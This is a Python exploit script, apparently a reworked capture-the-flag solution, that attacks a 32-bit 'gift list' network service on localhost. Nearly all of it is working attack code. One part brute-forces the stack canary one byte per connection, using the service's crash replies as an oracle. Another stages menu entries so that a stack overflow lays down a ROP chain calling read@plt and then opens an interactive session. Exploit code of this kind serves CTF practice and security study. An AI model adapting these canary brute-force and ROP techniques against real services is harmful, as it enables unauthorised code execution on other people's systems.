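import binascii
import os
import select
import socket
import struct
import sys
import time

try:
    # telnetlib was removed in Python 3.13; Interact() falls back to a select loop.
    import telnetlib
except ImportError:
    telnetlib = None


def p32(value):
    """Pack *value* as a 4-byte little-endian unsigned int (the target is 32-bit x86)."""
    return struct.pack("<I", value)


def _to_bytes(data):
    """Socket payloads must be bytes; text is encoded losslessly (latin-1) on Python 3."""
    if isinstance(data, bytes):
        return data
    return data.encode("latin-1")


class Exploit(object):
    """Two-stage exploit for the "gift list" service.

    Stage one (``CanaryLeak``) brute-forces the stack canary one byte per
    connection, judging each guess by the target's reply.  Stage two
    (``Attack``) stages gift entries so that the same overflow lays the leaked
    canary and a ROP chain on the stack.

    Every target address below is taken from the original script and is valid
    only for the exact binary it was written against.
    """

    Dest = ("localhost", 4000)
    Timeout = 5.0  # seconds; without it a hung target stalls the brute force forever

    # Prompts emitted by the target; each Send() waits for the matching one first.
    PROMPT_MENU = b"--->"
    PROMPT_NAME = b"Gift Name? >>>"
    PROMPT_COUNT = b"Number of Gift? >>>"

    # Addresses from the original script (its comments: "read@plt, PrintWelcome",
    # "ret", "pop ebp ,ret").  134515971 == 0x8048d03 and 134518038 == 0x8049516.
    RET = 0x8048d03
    READ_PLT = 0x8048770
    PRINT_WELCOME = 0x8048a93
    FLAG_BUF = 0x804b0a4  # "write this flag" in the original: read@plt buffer ...
    FLAG_LEN = 0x30       # ... and length
    POP_EBP_RET = 0x8049516

    # Fixed first byte, as in the original.  NOTE(review): a glibc canary normally
    # has a 0x00 low byte; confirm why 0xff is right for this target.
    CANARY_FIRST_BYTE = b"\xff"

    def start(self):
        """Kept for compatibility: just opens the connection."""
        self.Connect()

    def Connect(self):
        """Open a fresh TCP connection to ``Dest`` with ``Timeout`` applied."""
        self.s = socket.socket()
        self.s.settimeout(self.Timeout)
        self.s.connect(self.Dest)

    def CloseSock(self):
        """Close the current connection; safe to call when none is open."""
        sock = getattr(self, "s", None)
        if sock is not None:
            sock.close()
            self.s = None

    def read_until(self, msg):
        """Read one byte at a time until *msg* has been seen; return everything read.

        Byte-wise reads are deliberate: the next read must start exactly after
        the prompt and there is no buffering layer to hold over-read data.

        Raises:
            EOFError: the peer closed the connection before *msg* appeared
                (the original spun forever on the empty recv()).
        """
        msg = _to_bytes(msg)
        got = b""
        while msg not in got:
            chunk = self.s.recv(1)
            if not chunk:
                raise EOFError("connection closed while waiting for %r" % (msg,))
            got += chunk
        return got

    def Sendln(self, msg):
        """Send *msg* followed by a newline."""
        self.s.sendall(_to_bytes(msg) + b"\n")

    def Send(self, msg, until):
        """Wait for the prompt *until*, then send *msg* as a line."""
        self.read_until(until)
        self.Sendln(msg)

    def RawSend(self, msg, until):
        """Wait for the prompt *until*, then send *msg* with no trailing newline.

        Used for the binary entries (canary guess, packed addresses) where the
        original sends exactly the payload bytes and nothing more.
        """
        self.read_until(until)
        self.s.sendall(_to_bytes(msg))

    def Interact(self):
        """Hand the connection over to the user.

        Uses telnetlib's interact() where available (Python <= 3.12); otherwise
        a minimal stdin<->socket relay (POSIX only, like telnetlib's own loop).
        """
        self.s.settimeout(None)  # interactive use must not hit the probe timeout
        if telnetlib is not None:
            t = telnetlib.Telnet()
            t.sock = self.s
            t.interact()
            return
        while True:
            readable, _, _ = select.select([self.s, sys.stdin], [], [])
            if self.s in readable:
                data = self.s.recv(4096)
                if not data:
                    return
                sys.stdout.write(data.decode("latin-1"))
                sys.stdout.flush()
            if sys.stdin in readable:
                line = sys.stdin.readline()
                if not line:
                    return
                self.s.sendall(line.encode("latin-1"))

    def _TriggerOverflow(self):
        """Menu 2 with a 16-byte name and count 3.

        This is the sequence the original sends both to test a canary guess
        and to fire the final chain; the "Removing Is OK" reply suggests menu
        2 is the remove action that copies the staged entries over the stack.
        """
        self.Send(b"2", self.PROMPT_MENU)
        self.Send(b"A" * 16, self.PROMPT_NAME)
        self.Send(b"3", self.PROMPT_COUNT)

    def ReadyCanaryLeak(self, canary):
        """Stage two entries so the overflow lands *canary* on the saved canary.

        *canary* is the known prefix plus one candidate byte.  It is sent
        without a newline so the write ends exactly at the guessed byte.
        """
        self.Send(b"1", self.PROMPT_MENU)       # insert gift list (16-byte filler)
        self.Send(b"A" * 16, self.PROMPT_NAME)
        self.Send(b"-1", self.PROMPT_COUNT)
        self.Send(b"1", self.PROMPT_MENU)       # insert second list (the guess)
        self.RawSend(canary, self.PROMPT_NAME)
        self.Send(b"-1", self.PROMPT_COUNT)

    def _ProbeByte(self, known):
        """Try every candidate for the byte after *known*; return it, or None.

        Each attempt uses a fresh connection and is judged by the reply after
        the overflow: "stack smashing detected" means a wrong guess, "Removing
        Is OK" means the canary survived intact.  Any other outcome (timeout,
        reset, unexpected text) counts as a miss.
        """
        for candidate in range(0x1, 0x100):  # 0x00 skipped, as in the original
            guess = known + struct.pack("B", candidate)
            print("[*]canary 0x" + binascii.hexlify(guess).decode("ascii") + " attack !!")
            self.Connect()
            try:
                self.ReadyCanaryLeak(guess)
                self._TriggerOverflow()
                time.sleep(0.5)  # let the target finish (or abort) before reading its verdict
                reply = self.s.recv(9000)
            except (socket.error, EOFError):
                print("[*]no reply")
                continue
            finally:
                self.CloseSock()  # the original leaked the socket on every failed guess
            if b"stack smashing detected" in reply:
                print("[*]fail")
            elif b"Removing Is OK" in reply:
                print("[*]find canary " + "%02x" % candidate)
                return guess[-1:]
        return None

    def CanaryLeak(self):
        """Brute-force the 4-byte canary one byte at a time.

        The first byte is fixed (``CANARY_FIRST_BYTE``); three passes each try
        to extend the known prefix by one byte, so a pass that finds nothing is
        simply retried by the next one, as in the original.

        Returns:
            bytes | None: the full canary (also stored in ``self.Canary``), or
            None if fewer than four bytes were recovered.
        """
        known = self.CANARY_FIRST_BYTE
        for _ in range(3):
            found = self._ProbeByte(known)
            if found is None:
                print("[*]no candidate matched for byte %d" % len(known))
                continue
            known += found
        if len(known) == 4:
            self.Canary = known
            # These two messages were bare string expressions (never printed) in the original.
            print("[*]Find All canary : 0x" + binascii.hexlify(known).decode("ascii"))
            return known
        print("[*]Fail to Find canary")
        return None

    def Attack(self):
        """Stage the ROP chain and fire the overflow; needs ``self.Canary``.

        Entries are inserted in the order the overflow copies them.  Per the
        original's comments, an entry's decimal count (``#ret``,
        ``#pop ebp ,ret``) is stored as a 4-byte int that ends up as a return
        address, while the name fields carry packed addresses.  The first two
        entries go through Send() (newline appended) and the last two through
        RawSend(), exactly as in the original.

        NOTE(review): the original's pack/unpack lambdas were garbled in this
        listing; "<I" is assumed from the 32-bit (0x0804xxxx) addresses.

        Raises:
            RuntimeError: ``Canary`` is missing (the original failed with an
                AttributeError partway through the send sequence).
        """
        canary = getattr(self, "Canary", None)
        if not canary:
            raise RuntimeError("CanaryLeak() must succeed before Attack()")
        p = p32
        self.Connect()  # CanaryLeak() closes its last socket, so a new one is needed here
        # Entry 1: chain head — ret, ret, read@plt, PrintWelcome.
        self.Send(b"1", self.PROMPT_MENU)
        self.Send(p(self.RET) * 2 + p(self.READ_PLT) + p(self.PRINT_WELCOME), self.PROMPT_NAME)
        self.Send(b"0", self.PROMPT_COUNT)
        # Entry 2: read@plt arguments (buffer, length) — "write this flag".
        self.Send(b"1", self.PROMPT_MENU)
        self.Send(p(self.FLAG_BUF) + p(self.FLAG_LEN), self.PROMPT_NAME)
        self.Send(b"0", self.PROMPT_COUNT)
        # Entry 3: the trigger gift.
        self.Send(b"1", self.PROMPT_MENU)
        self.Send(b"A" * 16, self.PROMPT_NAME)
        self.Send(b"-1", self.PROMPT_COUNT)
        # Entry 4: leaked canary + padding; count doubles as a `ret` (ret sled).
        self.Send(b"1", self.PROMPT_MENU)
        self.RawSend(canary + b"A" * 12, self.PROMPT_NAME)
        self.Send(str(self.RET).encode("ascii"), self.PROMPT_COUNT)          # 134515971
        # Entry 5: four more `ret`s; count = pop ebp ; ret.
        self.Send(b"1", self.PROMPT_MENU)
        self.RawSend(p(self.RET) * 4, self.PROMPT_NAME)
        self.Send(str(self.POP_EBP_RET).encode("ascii"), self.PROMPT_COUNT)  # 134518038
        # Fire the overflow, feed the read@plt call in the chain, then hand over.
        self._TriggerOverflow()
        time.sleep(0.5)
        self.s.sendall(b"flag")  # consumed by read@plt; presumably the flag file name — confirm
        self.Interact()


def main(argv=None):
    """Leak the canary, then attack.  ``host port`` on the command line override ``Exploit.Dest``.

    Returns a process exit status: 1 when the canary could not be recovered
    (the original went on to Attack() and crashed on the missing attribute).
    """
    args = sys.argv[1:] if argv is None else argv
    ex = Exploit()
    if len(args) >= 2:
        ex.Dest = (args[0], int(args[1]))
    if ex.CanaryLeak() is None:
        print("[*]aborting: no canary")
        return 1
    ex.Attack()
    return 0


if __name__ == '__main__':
    sys.exit(main())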